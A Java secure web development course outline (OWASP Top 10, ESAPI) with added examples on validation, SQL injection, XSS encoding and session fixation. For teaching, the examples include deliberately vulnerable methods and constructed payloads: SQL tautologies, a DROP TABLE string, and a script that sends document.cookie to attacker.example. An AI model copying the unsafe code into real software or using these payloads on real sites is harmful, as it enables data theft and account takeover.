Summary
This two-day course provides students with the knowledge needed to design, build and test the security of web applications. For each vulnerability class the course explains the flaw, shows sample vulnerable code and presents solutions that protect the web application against common vulnerabilities.
The course involves hands-on demonstrations and labs. Every Java developer who builds web applications should be familiar with these vulnerabilities and know how to write defensive code. Many web applications today have no defence against attack; this class teaches how to write defensive code that prevents it.
This is a hands-on course that introduces the concepts and challenges students to:
• Make reasoned choices and implement secure code. All examples of secure code are based on the OWASP ESAPI library.
Intended Audience
• Intermediate Java Developers
Pre-requisite Knowledge
• Experience developing J2EE applications
Learning Objectives
• Foundation of application security and common attack patterns against applications, including the OWASP Top 10 for 2010
• Understanding of defensive development strategies to protect applications against common attack patterns, including the OWASP Top 10
Module 1: Introduction
• Latest News
• Hackers Evolution
• What is Application Security & Why It Matters?
• Introduction to OWASP Top 10
• What is the OWASP Top 10 and ESAPI?
• Overview of OWASP
• Injection
• Cross-Site Scripting (XSS)
• Broken Authentication and Session Management
• Insecure Direct Object References
• Cross-Site Request Forgery (CSRF)
• Security Misconfiguration
• Insecure Cryptographic Storage
• Failure to Restrict URL Access
• Insufficient Transport Layer Protection
• Unvalidated Redirects and Forwards
• What is Information Security?
• Security Principles
• Layered Security
• Segmentation
• Technical Controls
• Error Handling
• Application Security Architecture
Module 2: Input And Output Validation
• Concepts
• Canonicalization
• Data Validation
• Data Validation: Exact Match
• Data Validation: Known Good
• Data Validation: Example
• Data Validation: Reject Known Bad
• Client Side Controls
• Business Logic Validation
• Design Guidelines
• Design Patterns
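As an added illustration of the Module 2 topics (not part of the course material and not ESAPI code), the following Java class canonicalizes a request parameter and then applies known-good and exact-match validation to it. The parameter names, the username rule and the sample inputs are invented for the example; in the course's ESAPI the same two steps are Encoder.canonicalize() followed by a Validator check such as getValidInput().

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.text.Normalizer;
import java.util.Set;
import java.util.function.UnaryOperator;
import java.util.regex.Pattern;

/**
 * Added example, not course material: canonicalize first, then validate against what is known good.
 * The parameter names, rules and sample inputs are invented for the demonstration.
 */
public final class InputValidation {

    // Known-good pattern: a username is 3 to 32 ASCII letters, digits, dots or underscores.
    private static final Pattern USERNAME = Pattern.compile("^[A-Za-z0-9._]{3,32}$");

    // Exact match: a sort parameter may only be one of these column names.
    private static final Set<String> SORT_FIELDS = Set.of("name", "created", "price");

    /**
     * Canonicalization: reduce the value to its simplest form before any rule looks at it.
     * One round of URL decoding is what a browser produces; if a second round still changes the
     * value it was double encoded (%2527 -> %27 -> ') to slip past a filter, so it is rejected.
     * NFKC folds look-alike Unicode forms (full-width letters, ligatures) into plain characters.
     * URLDecoder throws IllegalArgumentException on malformed %-sequences, which is also a rejection.
     */
    static String canonicalize(String raw) {
        String once = URLDecoder.decode(raw, StandardCharsets.UTF_8);
        String twice = URLDecoder.decode(once, StandardCharsets.UTF_8);
        if (!once.equals(twice)) {
            throw new IllegalArgumentException("double-encoded input");
        }
        return Normalizer.normalize(once, Normalizer.Form.NFKC);
    }

    /** Known good: accept only values matching the pattern; anything else is rejected, never "cleaned". */
    static String validateUsername(String raw) {
        String value = canonicalize(raw);
        if (!USERNAME.matcher(value).matches()) {
            throw new IllegalArgumentException("username does not match the allowed pattern");
        }
        return value;
    }

    /** Exact match: the strongest form of validation, used where the set of legal values is small and fixed. */
    static String validateSortField(String raw) {
        String value = canonicalize(raw);
        if (!SORT_FIELDS.contains(value)) {
            throw new IllegalArgumentException("unknown sort field");
        }
        return value;
    }

    private static void show(String label, UnaryOperator<String> validator, String input) {
        try {
            System.out.println(label + " " + input + " -> accepted as \"" + validator.apply(input) + "\"");
        } catch (IllegalArgumentException e) {
            System.out.println(label + " " + input + " -> rejected (" + e.getMessage() + ")");
        }
    }

    public static void main(String[] args) {
        // Constructed inputs: one honest value per validator, then attack-shaped ones.
        show("username", InputValidation::validateUsername, "alice_01");
        show("username", InputValidation::validateUsername, "alice%27%20OR%201%3D1");      // ' OR 1=1 once decoded
        show("username", InputValidation::validateUsername, "%2527%2520OR%25201%253D1");   // double encoded
        show("username", InputValidation::validateUsername, "\uFF41lice");                 // full-width 'a'
        show("sort", InputValidation::validateSortField, "created");
        show("sort", InputValidation::validateSortField, "created;DROP TABLE users");
    }
}
```

The order matters: validating before canonicalizing lets an encoded form pass a check that its decoded form would fail, and then a later layer (the database driver, the browser) decodes it. Rejecting input that is encoded more than once is the "reject known bad" rule applied at the canonicalization step, before the known-good rules run.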
Module 3: SQL Injection
• Introduction
• Example Walkthrough
• Exploitability, Prevalence, Detectability and Impacts
• Time of Introduction and Application Platforms
• Prevention Techniques
• Prepared Statements
• Example
• Example: Bad Implementation
• Stored Procedures
• Example
• ORM Frameworks
• Hibernate Examples
• Escaping User Input
• Numeric SQL Injection
• Example
• Rule of Least Privilege
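To make the Module 3 bullets concrete, here is an added Java/JDBC example (not the course's own code). It assumes the H2 database driver is on the classpath and uses an in-memory database with a constructed users table. It shows the bad implementation that concatenates a string value, the numeric injection case where no quotes are involved at all, and the prepared-statement fix for both; the concatenated queries match every row, the parameterized ones do not.

```java
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;

/**
 * Added example, not course material. Assumes the H2 JDBC driver (h2-*.jar) is on the classpath;
 * the in-memory database, the users table and its two rows are constructed for the demonstration.
 */
public final class SqlInjectionDemo {

    static final String URL = "jdbc:h2:mem:demo;DB_CLOSE_DELAY=-1";

    static void seed(Connection c) throws SQLException {
        try (Statement s = c.createStatement()) {
            s.execute("CREATE TABLE users(id INT PRIMARY KEY, name VARCHAR(64), role VARCHAR(16))");
            s.execute("INSERT INTO users VALUES (1, 'alice', 'admin'), (2, 'bob', 'user')");
        }
    }

    /** Bad implementation: the user-controlled value becomes part of the SQL text itself. */
    static int countByNameUnsafe(Connection c, String name) throws SQLException {
        String sql = "SELECT COUNT(*) FROM users WHERE name = '" + name + "'";
        return runCount(c, sql);
    }

    /**
     * Numeric SQL injection: the value is not quoted, so "1 OR 1=1" is valid SQL that matches
     * every row. Escaping quotes would not help here because no quote ever appears.
     */
    static int countByIdUnsafe(Connection c, String id) throws SQLException {
        String sql = "SELECT COUNT(*) FROM users WHERE id = " + id;
        return runCount(c, sql);
    }

    /** Prepared statement: the value is bound as a parameter and cannot alter the query structure. */
    static int countByNameSafe(Connection c, String name) throws SQLException {
        try (PreparedStatement ps = c.prepareStatement("SELECT COUNT(*) FROM users WHERE name = ?")) {
            ps.setString(1, name);
            try (ResultSet rs = ps.executeQuery()) {
                rs.next();
                return rs.getInt(1);
            }
        }
    }

    /** Numeric column: parse to the expected type first, then bind; a non-number never reaches the database. */
    static int countByIdSafe(Connection c, String id) throws SQLException {
        int parsed = Integer.parseInt(id.trim()); // NumberFormatException for "1 OR 1=1"
        try (PreparedStatement ps = c.prepareStatement("SELECT COUNT(*) FROM users WHERE id = ?")) {
            ps.setInt(1, parsed);
            try (ResultSet rs = ps.executeQuery()) {
                rs.next();
                return rs.getInt(1);
            }
        }
    }

    private static int runCount(Connection c, String sql) throws SQLException {
        try (Statement s = c.createStatement(); ResultSet rs = s.executeQuery(sql)) {
            rs.next();
            return rs.getInt(1);
        }
    }

    public static void main(String[] args) throws SQLException {
        try (Connection c = DriverManager.getConnection(URL)) {
            seed(c);
            // Constructed payloads: a classic quote break-out and a purely numeric tautology.
            String namePayload = "x' OR '1'='1";
            System.out.println("concatenated name lookup : " + countByNameUnsafe(c, namePayload) + " rows");
            System.out.println("prepared name lookup     : " + countByNameSafe(c, namePayload) + " rows");
            String idPayload = "1 OR 1=1";
            System.out.println("concatenated id lookup   : " + countByIdUnsafe(c, idPayload) + " rows");
            try {
                countByIdSafe(c, idPayload);
            } catch (NumberFormatException e) {
                System.out.println("prepared id lookup       : rejected before reaching the database");
            }
        }
    }
}
```

Two caveats a practitioner should keep in mind: bind parameters can only carry values, so a user-controlled table or column name (for example an ORDER BY field) must be validated against a fixed list instead, and the database account the application connects with should hold only the privileges the queries need, which is the "Rule of Least Privilege" item in this module.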
Module 4: Cross-Site Scripting (XSS)
• Stored XSS
• Reflected XSS
• Examples
• Exploitability, Prevalence, Detectability and Impacts
• Time of Introduction and Application Platforms
• Prevention Techniques
• Prevention Techniques: OWASP XSS Rules
• Standard Escaping Implementations
• Examples
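An added Java example for Module 4 (not course material and not ESAPI code): two small encoders that follow OWASP XSS Prevention Rules #1 and #2, and a comment template rendered once without them and once with them. The comment fields and the attack payloads are constructed for the demonstration.

```java
/**
 * Added example, not course material and not ESAPI code: hand-written encoders following
 * OWASP XSS Prevention Rules #1 (HTML body) and #2 (HTML attribute), applied to a stored
 * comment before it is written into a page. Fields and payloads are constructed.
 */
public final class XssOutputEncoding {

    /** Rule #1, HTML body context: entity-encode the characters that can open or close markup. */
    static String encodeForHtml(String s) {
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char ch = s.charAt(i);
            switch (ch) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#x27;"); break;
                case '/':  out.append("&#x2F;"); break;
                default:   out.append(ch);
            }
        }
        return out.toString();
    }

    /**
     * Rule #2, HTML attribute context: encode everything that is not [A-Za-z0-9] as &#xHH;.
     * Stricter than Rule #1 because an unquoted attribute ends at a space and several other
     * characters, after which the attacker simply starts a new attribute (onmouseover=...).
     * Iterates by code point so characters outside the BMP are encoded as one entity.
     */
    static String encodeForHtmlAttribute(String s) {
        StringBuilder out = new StringBuilder(s.length() + 16);
        s.codePoints().forEach(cp -> {
            boolean alnum = (cp >= 'a' && cp <= 'z') || (cp >= 'A' && cp <= 'Z') || (cp >= '0' && cp <= '9');
            if (alnum) {
                out.appendCodePoint(cp);
            } else {
                out.append("&#x").append(Integer.toHexString(cp)).append(';');
            }
        });
        return out.toString();
    }

    /** Each value is encoded for the exact context it lands in: attribute value first, element body second. */
    static String renderComment(String author, String body) {
        return "<div class=\"comment\" data-author=\"" + encodeForHtmlAttribute(author) + "\">"
             + "<p>" + encodeForHtml(body) + "</p></div>";
    }

    /** The same template with raw values: the shape of both stored and reflected XSS. */
    static String renderCommentUnsafe(String author, String body) {
        return "<div class=\"comment\" data-author=\"" + author + "\"><p>" + body + "</p></div>";
    }

    public static void main(String[] args) {
        // Constructed payloads: one breaks out of the attribute, the other injects a script element.
        String author = "x\" onmouseover=\"alert(1)";
        String body = "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>";
        System.out.println("unsafe : " + renderCommentUnsafe(author, body));
        System.out.println("encoded: " + renderComment(author, body));
    }
}
```

In the course's ESAPI the equivalents are ESAPI.encoder().encodeForHTML() and encodeForHTMLAttribute(), with separate encoders (encodeForJavaScript, encodeForURL, encodeForCSS) for the other contexts the OWASP rules cover. Encoding is always chosen by the output context, not by the input; and no encoder makes it safe to place untrusted data inside script code, an event handler or a javascript: URL, which the OWASP rules simply forbid.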
Module 5: Broken Authentication and Session Management
• Introduction
• Session Fixation
• Session Fixation Demo
• Session Fixation Examples
• Attack Process
• STEP 1: Session Setup
• STEP 2: Session Fixation
• Session ID in a URL Argument
• Session ID in a Hidden Form Field
• Session ID in a Cookie
• STEP 3: Session Entrance
• Session Fixation Defense
• Session Fixation vs. Session Hijacking
• Exercises
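The session fixation defense listed for Module 5, as an added Java servlet example that is not part of the course material: the session identifier that existed before authentication is replaced at the moment of login, so an identifier the attacker planted in step 2 never becomes an authenticated one. It assumes the Servlet 3.1 API (javax.servlet) on the classpath; authenticate() is an abstract hook standing in for the application's real credential check, and the parameter names and the /home redirect are invented.

```java
import java.io.IOException;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;

/**
 * Added example, not course material. Assumes the Servlet 3.1 API (javax.servlet) on the classpath.
 * authenticate() is an abstract hook standing in for the application's real credential check;
 * the parameter names and the /home redirect are invented for the demonstration.
 */
public abstract class LoginServlet extends HttpServlet {

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp)
            throws ServletException, IOException {
        String user = req.getParameter("username");
        String password = req.getParameter("password");
        if (user == null || password == null || !authenticate(user, password)) {
            resp.sendError(HttpServletResponse.SC_UNAUTHORIZED);
            return;
        }

        // Session fixation defence: the ID that existed before login must not survive
        // authentication. If an attacker planted it (URL argument, hidden field or cookie),
        // they know it; issuing a fresh ID when privilege changes cuts them off.
        HttpSession session = req.getSession(true);
        req.changeSessionId();                    // Servlet 3.1+: new ID, same session attributes
        session.setAttribute("user", user);
        session.setMaxInactiveInterval(15 * 60);  // idle timeout limits how long a leaked ID is useful
        resp.sendRedirect(req.getContextPath() + "/home");
    }

    /**
     * For containers older than Servlet 3.1 the only way to obtain a new ID is to discard the
     * old session and create another. Invalidation drops every attribute, which is the safe
     * default: re-establish after login whatever the application genuinely needs.
     */
    static HttpSession rotateSessionLegacy(HttpServletRequest req) {
        HttpSession old = req.getSession(false);
        if (old != null) {
            old.invalidate();
        }
        return req.getSession(true);
    }

    /** Verify the credentials against the application's user store (salted hash comparison). */
    protected abstract boolean authenticate(String user, String password);
}
```

Rotation closes the fixation path; the other vectors in this module are closed in deployment configuration. In a Servlet 3.0+ web.xml, <session-config> with <tracking-mode>COOKIE</tracking-mode> stops the container from ever writing the ID into a URL argument, and <cookie-config> with <http-only>true</http-only> and <secure>true</secure> keeps the cookie away from script and off plaintext connections. That distinction is the "Session Fixation vs. Session Hijacking" item: rotating the ID does nothing if the attacker steals the post-login ID instead, which is what the cookie flags and TLS are for. Spring Security, covered in the optional module, performs this rotation on login by default.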
Module 6: Insecure Direct Object References
• Concepts
• Examples
• Exploitability, Prevalence, Detectability and Impacts
• Time of Introduction and Application Platforms
• Prevention Techniques
Module 7: Secure Design Principles
• The Need for Secure Design
• Confidentiality
• Integrity
• Availability
• Authentication
• Authorization
• Auditing and Logging
• Least Privilege
• Separation of Duties
• Defense in Depth
• Fail Safe
• Economy of Mechanism
• Open Design
• Limit the Number of Entry Points to Your Application
• Do Not Reinvent the Wheel
• Do Not Reveal Too Much Information
Optional: Spring Security Framework